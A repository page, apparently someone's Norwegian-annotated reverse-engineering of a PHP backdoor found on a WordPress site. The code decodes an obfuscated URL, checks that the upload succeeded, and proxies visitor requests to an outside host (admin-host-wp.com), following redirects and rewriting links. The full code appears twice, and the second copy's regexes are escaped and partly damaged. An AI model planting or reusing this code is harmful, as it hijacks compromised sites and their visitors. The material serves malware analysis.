MartinIngesen/StormenWordpress

## StormenWordpress
<?php
// DISCLAIMER: I AM JUST TRYING TO REVERSE THIS CODE. I AM NOT THE CREATOR, NOR HAVE I EVER USED THIS TO EXPLOIT ANYTHING.


// skrur av feilmeldinger.
error_reporting(0);

$lru = "gg/66551324912345824801528/291s293r654o358d894-4502674n550i200a383m417/539n523o433t599t860u453b488d347e322r290/806m243o771c122.808p804w934-266t284s462o458h478-117n717i372m468d391a823/568/674:241p107t197t574h606";
$url = '';

/**
* Looper baklengs over $lru og henter ut hver 4de karakter. Resultatet blir lagret i $url.
* $url = http://admin-host-wp.com/redbutton/main2-dors/12345/
*/

if (substr($lru, 0, 2) == 'gg'){
	for ($x = strlen($lru); $x > 0; $x-= 4)
		$url.= substr($lru, $x, 1);
}else{
	$url = $lru;
}


$e = '.php';
$q = "";
$test = 'suka-test';

/*

(!$q || isset($_GET[$q]) er alltid lik true, da !$q alltid vil være true.

Vi må sette $_GET[$q] eller $_SERVER["QUERY_STRING"] lik noe som passerer REGEXen. 2 random bokstaver feks fungerer fint.
*/
if ((!$q || isset($_GET[$q])) && preg_match("/^[^\/][a-z0-9-_\/\.]+$/i", $a = $q ? $_GET[$q] : $_SERVER["QUERY_STRING"])){

	// Denne delen er der nok bare for å sjekke at exploiten har blitt lastet opp. Evt automatisering.
	$strlena = strlen($a); // lengden av $a
	$aori = $a;
	$a = rtrim($a, '/'); // fjern alle / på slutten av $a
	if ($test && $a == $test){ // hvis $a er lik $test (suka-test)
		echo 'OK';
		exit;
	}
	// for å teste; gå til filnavn.php/?suka-test


	$w = preg_replace("/^([a-z0-9-_\/]+)(\.php|\.html|\/|)$/i", '$1' . $e, $a, -1, $h);

	echo $url . ($w = preg_replace("/^([a-z0-9-_\/]+)(\.php|\.html|\/|)$/i", '$1' . $e, $a, -1, $h));


	exit();

	// curler http://admin-host-wp.com/redbutton/main2-dors/12345/ + det man har skrevet inn som URL parameter.
	curl_setopt($ch = curl_init($url . ($w = preg_replace("/^([a-z0-9-_\/]+)(\.php|\.html|\/|)$/i", '$1' . $e, $a, -1, $h))) , CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($ch, CURLOPT_HEADER, 0);
	curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
	curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]);
	if (isset($_SERVER["HTTP_REFERER"])) curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_REFERER"]);
	$result = curl_exec($ch);
	if ((($c = curl_getinfo($ch, CURLINFO_HTTP_CODE)) == 301 || $c == 302) && ($u = curl_getinfo($ch, CURLINFO_EFFECTIVE_URL)))
		{
		$end = FALSE;
		$rd = $u;
		while ($end === FALSE)
			{
			curl_setopt($cht = curl_init($rd) , CURLOPT_RETURNTRANSFER, 1);
			curl_setopt($cht, CURLOPT_HEADER, 1);
			curl_setopt($cht, CURLOPT_FOLLOWLOCATION, 0);
			curl_setopt($cht, CURLOPT_USERAGENT, 'Opera');
			curl_setopt($cht, CURLOPT_REFERER, 'http://www.google.com');
			$rrt = curl_exec($cht);
			$u = curl_getinfo($cht, CURLINFO_EFFECTIVE_URL);
			if (preg_match('#Location\: ([\S]+)#si', $rrt, $rdr))
				{
				$rd = $rdr[1];
				if (!preg_match('#redbutton#', $rd))
					{
					$end = TRUE;
					break;
					}
				}
			  else
				{
				$end = TRUE;
				break;
				}
			}

		header('Location: ' . $rd, true, $c);
		exit;
		}
	  else
	if ($c == 200 && $result)
		{
		header('Content-Type: ' . curl_getinfo($ch, CURLINFO_CONTENT_TYPE));
		$result = preg_replace('#^.*?\<html#si', '<html', $result);
		$ori = $result;
		$t = $_SERVER["SCRIPT_NAME"];
		$h = strlen($w) - strlen($e) - $strlena;
		$result = preg_replace('/background(-image\\(.*?url\(["\'])([^\/][a-z0-9-_\.\/]+)(["\']\))/i', 'background$1$2' . $t . '$3$4', $result);
		$hz = ($h < 0) ? substr($a, $h) : "";
		if (substr($aori, -1) == '/')
			{
			$result = preg_replace('/<(a|link|img)(.*?)(href|src)=["\']((?!http|\/)[a-z0-9-_\.\/\?\=]+)["\'](.*?)>/i', '<$1$2$3="../$4"$5>', $result);
			}

		$result = (($h) || substr($a, -4) == '.css') ? preg_replace('/<a(.*?)href=["\'](' . preg_quote($t, '/') . '[a-z0-9-_]+)(' . preg_quote($e) . ')["\'](.*?)>/i', '<a$1href="$2' . $hz . '"$4>', $result) : $ori;
		if (strpos($_SERVER['REQUEST_URI'], 'index.php?') !== FALSE)
			{
			$result = preg_replace('/<(link|img)(.*?)(href|src)=["\']((?!http|\/)[a-z0-9-_\.\/\=]+).*?["\'](.*?)>/i', '<$1$2$3="index.php?$4"$5>', $result);
			}

		echo $result;
		exit;
		}
	}
	<?php
	// DISCLAIMER: I AM JUST TRYING TO REVERSE THIS CODE. I AM NOT THE CREATOR, NOR HAVE I EVER USED THIS TO EXPLOIT ANYTHING.


	// skrur av feilmeldinger.
	error_reporting(0);

	$lru = "gg/66551324912345824801528/291s293r654o358d894-4502674n550i200a383m417/539n523o433t599t860u453b488d347e322r290/806m243o771c122.808p804w934-266t284s462o458h478-117n717i372m468d391a823/568/674:241p107t197t574h606";
	$url = '';

	/**
	* Looper baklengs over $lru og henter ut hver 4de karakter. Resultatet blir lagret i $url.
	* $url = http://admin-host-wp.com/redbutton/main2-dors/12345/
	*/

	if (substr($lru, 0, 2) == 'gg'){
	for ($x = strlen($lru); $x > 0; $x-= 4)
	$url.= substr($lru, $x, 1);
	}else{
	$url = $lru;
	}


	$e = '.php';
	$q = "";
	$test = 'suka-test';

	/*

	(!$q \|\| isset($_GET[$q]) er alltid lik true, da !$q alltid vil være true.

	Vi må sette $_GET[$q] eller $_SERVER["QUERY_STRING"] lik noe som passerer REGEXen. 2 random bokstaver feks fungerer fint.
	*/
	if ((!$q \|\| isset($_GET[$q])) && preg_match("/^[^\/][a-z0-9-_\/\.]+$/i", $a = $q ? $_GET[$q] : $_SERVER["QUERY_STRING"])){

	// Denne delen er der nok bare for å sjekke at exploiten har blitt lastet opp. Evt automatisering.
	$strlena = strlen($a); // lengden av $a
	$aori = $a;
	$a = rtrim($a, '/'); // fjern alle / på slutten av $a
	if ($test && $a == $test){ // hvis $a er lik $test (suka-test)
	echo 'OK';
	exit;
	}
	// for å teste; gå til filnavn.php/?suka-test


	$w = preg_replace("/^([a-z0-9-_\/]+)(\.php\|\.html\|\/\|)$/i", '$1' . $e, $a, -1, $h);

	echo $url . ($w = preg_replace("/^([a-z0-9-_\/]+)(\.php\|\.html\|\/\|)$/i", '$1' . $e, $a, -1, $h));


	exit();

	// curler http://admin-host-wp.com/redbutton/main2-dors/12345/ + det man har skrevet inn som URL parameter.
	curl_setopt($ch = curl_init($url . ($w = preg_replace("/^([a-z0-9-_\/]+)(\.php\|\.html\|\/\|)$/i", '$1' . $e, $a, -1, $h))) , CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($ch, CURLOPT_HEADER, 0);
	curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
	curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]);
	if (isset($_SERVER["HTTP_REFERER"])) curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_REFERER"]);
	$result = curl_exec($ch);
	if ((($c = curl_getinfo($ch, CURLINFO_HTTP_CODE)) == 301 \|\| $c == 302) && ($u = curl_getinfo($ch, CURLINFO_EFFECTIVE_URL)))
	{
	$end = FALSE;
	$rd = $u;
	while ($end === FALSE)
	{
	curl_setopt($cht = curl_init($rd) , CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($cht, CURLOPT_HEADER, 1);
	curl_setopt($cht, CURLOPT_FOLLOWLOCATION, 0);
	curl_setopt($cht, CURLOPT_USERAGENT, 'Opera');
	curl_setopt($cht, CURLOPT_REFERER, 'http://www.google.com');
	$rrt = curl_exec($cht);
	$u = curl_getinfo($cht, CURLINFO_EFFECTIVE_URL);
	if (preg_match('#Location\: ([\S]+)#si', $rrt, $rdr))
	{
	$rd = $rdr[1];
	if (!preg_match('#redbutton#', $rd))
	{
	$end = TRUE;
	break;
	}
	}
	else
	{
	$end = TRUE;
	break;
	}
	}

	header('Location: ' . $rd, true, $c);
	exit;
	}
	else
	if ($c == 200 && $result)
	{
	header('Content-Type: ' . curl_getinfo($ch, CURLINFO_CONTENT_TYPE));
	$result = preg_replace('#^.*?\<html#si', '<html', $result);
	$ori = $result;
	$t = $_SERVER["SCRIPT_NAME"];
	$h = strlen($w) - strlen($e) - $strlena;
	$result = preg_replace('/background(-image\\(.*?url\(["\'])([^\/][a-z0-9-_\.\/]+)(["\']\))/i', 'background$1$2' . $t . '$3$4', $result);
	$hz = ($h < 0) ? substr($a, $h) : "";
	if (substr($aori, -1) == '/')
	{
	$result = preg_replace('/<(a\|link\|img)(.?)(href\|src)=["\']((?!http\|\/)[a-z0-9-_\.\/\?\=]+)["\'](.?)>/i', '<$1$2$3="../$4"$5>', $result);
	}

	$result = (($h) \|\| substr($a, -4) == '.css') ? preg_replace('/<a(.?)href=["\'](' . preg_quote($t, '/') . '[a-z0-9-_]+)(' . preg_quote($e) . ')["\'](.?)>/i', '<a$1href="$2' . $hz . '"$4>', $result) : $ori;
	if (strpos($_SERVER['REQUEST_URI'], 'index.php?') !== FALSE)
	{
	$result = preg_replace('/<(link\|img)(.?)(href\|src)=["\']((?!http\|\/)[a-z0-9-_\.\/\=]+).?["\'](.*?)>/i', '<$1$2$3="index.php?$4"$5>', $result);
	}

	echo $result;
	exit;
	}
	}